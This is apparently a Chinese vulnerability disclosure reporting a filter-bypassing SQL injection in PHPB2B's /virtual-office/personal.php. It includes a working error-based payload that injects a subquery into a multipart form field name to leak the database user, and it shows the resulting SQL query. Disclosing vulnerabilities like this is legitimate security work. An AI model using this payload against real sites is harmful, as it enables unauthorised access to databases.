PHPB2B注入#2(绕过过滤)

  • A+
所属分类:漏洞时代
摘要

PHPB2B某处注入#1。绕过过滤。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。


漏洞作者: darker

PHPB2B某处注入#1。绕过过滤。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。

详细说明:

POST /virtual-office/personal.php

Content-Disposition: form-data; name="memberfield[first_name]"

Content-Disposition: form-data; name="memberfield[last_name]"

...

...

first_name,last_name,gender,address,zipcode,qq,icq,msn,yahoo,skype,tel,fax,mobile,site_url,area_id 等未过滤。

提交

Content-Disposition: form-data; name="memberfield[first_name FROM pb_thk_memberfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#]"

执行:

SELECT first_name FROM pb_thk_memberfields where 1=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#,last_name,gender,address,zipcode,qq,icq,msn,yahoo,skype,tel,fax,mobile,site_url,area_id FROM pb_thk_memberfields WHERE member_id='3'

漏洞证明:

本地开启debug。默认不开启,可延时注入。
PHPB2B注入#2(绕过过滤)

数据库日志。

PHPB2B注入#2(绕过过滤)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: